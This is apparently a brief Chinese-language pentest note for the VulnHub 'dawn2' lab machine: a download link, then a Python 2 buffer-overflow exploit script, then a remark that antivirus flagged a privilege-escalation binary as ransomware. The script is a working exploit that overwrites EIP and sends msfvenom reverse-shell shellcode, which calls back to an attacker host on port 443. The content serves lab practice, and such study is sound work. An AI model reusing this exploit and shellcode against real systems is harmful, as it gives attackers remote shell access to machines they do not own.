下载地址
https://download.vulnhub.com/sunset/dawn2.7z
EXP脚本
#!/usr/bin/python
import socket
# msfvenom -p linux/x86/shell_reverse_tcp LHOST=172.16.12.5 LPORT=443 -f c -b '\x00' EXITFUNC=thread
try:
print "\nSending evil buffer..."
filler = "A" * 272
eip = "\xBA\x64\x59\x34"
buffer = (
"\xba\xd0\xa8\x43\x8f\xd9\xe8\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
"\x12\x83\xee\xfc\x31\x56\x0e\x03\x86\xa6\xa1\x7a\x17\x6c\xd2"
"\x66\x04\xd1\x4e\x03\xa8\x5c\x91\x63\xca\x93\xd2\x17\x4b\x9c"
"\xec\xda\xeb\x95\x6b\x1c\x83\x89\x9c\xd2\x56\xba\x9e\xea\x59"
"\x81\x16\x0b\xe9\x93\x78\x9d\x5a\xef\x7a\x94\xbd\xc2\xfd\xf4"
"\x55\xb3\xd2\x8b\xcd\x23\x02\x43\x6f\xdd\xd5\x78\x3d\x4e\x6f"
"\x9f\x71\x7b\xa2\xe0")
inputBuffer = filler + eip + "\x90" * 20 + buffer + "\x00"
buffer = inputBuffer
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.12.7", 1985))
s.send(buffer)
s.close()
print "\nDone!"
except:
print "\nCould not connect!"
注
提权也是下载名为dawn-BETA.exe的文件,但是被杀了显示勒索病毒就没再继续了,其格式是一样的。